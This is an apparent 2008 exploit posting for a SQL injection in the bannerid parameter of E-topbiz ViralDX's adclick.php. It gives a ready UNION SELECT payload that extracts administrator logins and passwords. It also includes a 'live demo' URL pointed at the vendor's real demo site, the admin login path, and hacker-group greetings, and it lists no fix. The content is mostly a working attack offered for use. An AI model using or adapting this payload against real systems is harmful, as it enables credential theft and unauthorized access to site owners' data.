E-topbiz ViralDX 2.07 (adclick.php bannerid) SQL Injection Vulnerability

2008-06-24 00:00:00

#########################################################
#
# Viral DX 1 SQL Injection Vulnerability
#========================================================
#
# Author: Hussin X
#
# Home : www.tryag.cc/cc
#
# email: darkangel_g85[at]Yahoo[DoT]com
# hussin.x[at]hotmail[DoT]com
#
#========================================================
# HomE script : http://e-topbiz.com/
#
# Demo : http://e-topbiz.com/trafficdemos/viraldx1/
#
#
##########################################################

Exploit:

http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws

(0x3a,login,pass)+from+pass--



L!VE DEMO:

http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-

1+union+select+concat_ws(0x3a,login,pass)+from+pass--


LoGiN :

/admin/login.php


################################################################################
####################################( Greetz )##################################
# #
# tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke #
# Silic0n / Rafi / FAHD / Iraqihack #
# #
#################################(and All IRAQIs)###############################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.